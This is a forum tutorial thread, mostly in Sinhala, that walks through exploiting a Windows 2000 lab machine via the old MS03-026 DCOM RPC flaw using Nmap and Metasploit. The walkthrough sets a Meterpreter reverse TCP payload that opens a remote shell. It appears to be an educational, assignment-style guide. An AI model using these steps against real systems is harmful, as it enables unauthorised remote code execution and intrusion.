ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] Exploit Windows 2000 Machine with Metasploit
#1
Exploit Windows 2000 Machine


මේ thread එකෙන් ගෙනාවේ windows 2000 machine එකක් exploit කරන්න. තෙරෙන සිංහලෙන් කිව්වොත් hack කරන හැටි. windows 2000 මේ වන විට බාවිතයේ නැති උනත් මේවා ගැන දැන ගෙන ඉන්න එක වටිනවා. මේ video එක හැදුවෙත් assignment එකකටම තමා  Big Grin . පහලින් written tutorial එක දන්නම්. (කඩ්ඩෙන් තියෙන්නේ. මටත් හරියට බෑ පුලුවන් විදියට ලිව්වේ.)



Machine Details: Microsoft Windows 2000 (5.00.2195)
Download VM: [Only registered and activated users can see links Click here to register]

[Image: sEppDvBl.png]




Steps to Exploit the vulnerability

1.     Find the IP address of the machine.

if you have login access to the machine, using “ipconfig” command you can get the IP address. If don’t, you can find the IP using IP range scan if the machine is in the same network.

[Image: LRvCJ0Sl.png]


2.     Scan Ports

Using Nmap, we can scan ports.
Syntax: nmap <IP address>

[Image: 9AIRzKfl.png]

 

3.     Search and find Vulnerabilities and exploits

Searching Google or using vulnerability scanner, we can find vulnerabilities and exploits related to the vulnerabilities.

I was able to find this vulnerability in “msrpc” service which is running on port 135 searching google.

Vulnerability Details

Vulnerability:  Buffer Overrun in RPC Interface Could Allow Code Execution

Microsoft Security Bulletin: ms03_026

CVE ID: CVE-2003-0352

Affected Systems:

·        Microsoft Windows NT® 4.0

·        Microsoft Windows NT 4.0 Terminal Services Edition

·        Microsoft Windows 2000

·        Microsoft Windows XP

·        Microsoft Windows Server™ 2003

 

There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.

This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on RPC enabled ports. This interface handles DCOM object activation requests that are sent by client machines to the server.

An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing changing or deleting data, or creating new accounts with full privileges.

To exploit this vulnerability, an attacker would need to send a specially formed request to the remote computer on specific RPC ports.

(ref: [Only registered and activated users can see links Click here to register])

 

4.     Find the Metasploit Exploit

First open the Metasploit.


Code:
msfconsole


Then search the exploit using the search feature


Code:
search ms03_026


Now you will get this exploit: exploit/windows/dcerpc/ms03_026_dcom

[Image: 58mIW4Wl.png]



 

5.     Setting up the exploit

Type the exploit with “use” command to use the exploit.

Syntax: use <exploit name>


Code:
use exploit/windows/dcerpc/ms03_026_dcom
 

Then type “show options” to see what settings we have to give to the exploit.

[Image: rSB9XSIl.png]

 

Now set the RHOST (IP address of the windows 2000 machine)

Syntax: set RHOST <remote ip>

[Image: BrsmWXql.png]

Don’t need to change the RPORT, Use the default port.



6.     Set the Payload

We don’t need to set a payload manually. Because automatically a payload will be selected by the Metasploit itself. But we can also set a payload.

In here, I will use “windows/meterpreter/reverse_tcp” (this is the default payload).

Syntax: set PAYLOAD <payload name>

[Image: UqKEIhYl.png] 

Type “show options” to see what options need to give to the payload.

[Image: dYuPUR9l.png]
 

Set your Local IP address as the LHOST. Using “ifconfig” command you can find your IP.

And set a Local Port. Default is port 4444.

[Image: H61EctUl.png]


7.     Run the exploit.

After all things done, run the exploit using “run” command or “exploit” command.

[Image: 8I4MzOQl.png]

Within seconds, you will get a Meterpreter session opened. Type “sysinfo” to get information about the system. Type “shell” to open the windows shell. Type “help” to get all the commands that you can run. 

Anøn LK 
(Admin & Moderate Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
#2
TFS mcn
Reply
#3
patta bro..
TFS.. Smile :hart:
<>
.:: [Induwara Uthsara] :: [රතු කුරුල්ලා] ::.
Idea  [Only registered and activated users can see links Click here to register] Idea
 Idea [Only registered and activated users can see links Click here to register]  Idea
</>
Reply
#4
fit ela
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
Tongue [Tut] THE METASPLOIT Project part-4 | Finding deleted webpages? Mmx 10 1,287 04-30-2019, 08:55 AM
Last Post: Nick Killer(Nadun)
Star [Tut] METERPRETER || THE METASPLOIT Project part-3 Mmx 9 1,342 04-29-2019, 08:40 AM
Last Post: Mr. X
  [Tut] THE METASPLOIT Project part-2 Mmx 4 897 04-29-2019, 07:46 AM
Last Post: Nick Killer(Nadun)
  [Tut] THE METASPLOIT Project part-1 Mmx 7 1,196 04-29-2019, 07:40 AM
Last Post: Nick Killer(Nadun)
Tongue [Tut] Sploitus | Exploit & Hacktool Search Engine Mmx 5 809 03-29-2019, 12:51 PM
Last Post: Manju
Exclamation [Tut] EXPLOIT DEVELOPMENT -02 CPU Registers ph03n1x 8 839 03-21-2019, 07:17 AM
Last Post: ravindusha
  [Tut] EXPLOIT DEVELOPMENT ph03n1x 11 1,505 02-24-2019, 08:31 AM
Last Post: Lushion Hydra
Heart [Tut] Linux Exploit Development ph03n1x 4 430 02-21-2019, 05:11 AM
Last Post: ph03n1x



Users browsing this thread: 1 Guest(s)